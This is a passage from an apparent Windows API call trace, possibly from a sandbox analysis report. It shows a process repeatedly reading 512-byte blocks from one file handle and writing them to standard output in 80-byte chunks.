lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] GetFileType (hFile=0x4c) returned 0x1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.063] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.063] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.063] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.063] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] GetFileType (hFile=0x4c) returned 0x1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] GetFileType (hFile=0x4c) returned 0x1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] GetFileType (hFile=0x4c) returned 0x1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] GetFileType (hFile=0x4c) returned 0x1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] GetFileType (hFile=0x4c) returned 0x1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] GetFileType (hFile=0x4c) returned 0x1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] GetFileType (hFile=0x4c) returned 0x1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] GetFileType (hFile=0x4c) returned 0x1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.064] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.064] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] GetFileType (hFile=0x4c) returned 0x1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] GetFileType (hFile=0x4c) returned 0x1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.065] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.065] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.066] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.066] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] GetFileType (hFile=0x4c) returned 0x1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] GetFileType (hFile=0x4c) returned 0x1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] GetFileType (hFile=0x4c) returned 0x1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] GetFileType (hFile=0x4c) returned 0x1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] GetFileType (hFile=0x4c) returned 0x1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] GetFileType (hFile=0x4c) returned 0x1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.068] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.068] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.068] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.068] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] GetFileType (hFile=0x4c) returned 0x1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] GetFileType (hFile=0x4c) returned 0x1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] GetFileType (hFile=0x4c) returned 0x1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] GetFileType (hFile=0x4c) returned 0x1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] GetFileType (hFile=0x4c) returned 0x1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] GetFileType (hFile=0x4c) returned 0x1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] GetFileType (hFile=0x4c) returned 0x1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] GetFileType (hFile=0x4c) returned 0x1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.069] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.069] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] GetFileType (hFile=0x4c) returned 0x1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] GetFileType (hFile=0x4c) returned 0x1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] GetFileType (hFile=0x4c) returned 0x1 [0115.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] GetFileType (hFile=0x4c) returned 0x1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] GetFileType (hFile=0x4c) returned 0x1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] GetFileType (hFile=0x4c) returned 0x1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] GetFileType (hFile=0x4c) returned 0x1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] GetFileType (hFile=0x4c) returned 0x1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.070] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.070] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] GetFileType (hFile=0x4c) returned 0x1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] GetFileType (hFile=0x4c) returned 0x1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.071] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.071] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.071] GetFileType (hFile=0x4c) returned 0x1 [0115.071] _get_osfhandle (_FileHandle=1) 